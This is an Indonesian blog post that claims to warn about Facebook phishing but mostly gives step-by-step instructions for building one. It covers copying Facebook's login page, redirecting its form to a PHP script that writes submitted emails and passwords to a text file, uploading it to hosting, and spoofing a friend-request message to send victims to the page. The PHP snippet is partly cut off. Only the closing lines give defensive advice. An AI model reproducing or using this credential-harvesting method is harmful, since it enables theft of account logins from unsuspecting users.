oleh

Fake Login Facebook, Hati – Hati Dengan Phising Login Di Facebook

 Postingan ini  tidak untuk mengajarkan melaksanakan phising, tapi cuma memberi sedikit pengetahuan biar semua lebih berhati- hati dalam melaksanakan login baik di facebook,di Friendster, transaksi online dan lainnya, caranya :

1. Buka http://www.facebook.com/login.php, kemudian view source , atau juga dapat tekan ctrl+u . copy dan paste ke notepad. Cari “action=” (tanpa quote) dan kita akan memulai editingnya.
pada bulat merah action=”https://login.facebook.com/login.php” rubahlah menjadi  action=”next.php” pada bulat biru, rubah methode dari “POST” menjadi “get” simpan notepad ini menjadi index.php (jangan html)

2. buka notepad gres isikan aba-aba berikut :

$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

simpan sebagai next.php

3. buka notepad lagi biarkan kosong, kemudian simpan dng nama pass.txt

Upload 3 file tersebut “index.php, next.php, pass.txt” kedalam hosting. aku rasa semua memiliki hosting kesukaan masing2,.
OK,Sekarang Kamu sudah punya phising page facebook .

4. Langkah-langkah spoofing.

copy content orisinil permintaan pertemanan dari facebook.
edit hyperlink dari : http:/www.facebook.com/n/?reqs.php ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content orisinil facebook tapi tetap mengarah ke halaman phising kamu.
phising siap dikirim ke korban kamu.
Dari modus di atas tadi semua dapat kita antisipasi bila kita teliti dahulu sebelum masuk(login) ke situs” yg membutuhkan password & email (inilah pola fake login palsu)

Ingat ini cuma sebagai contoh, jangan masukkan email atau password teman2 mu ya,.jadikan pelajaran aja dan biar lebih hati2

News Feed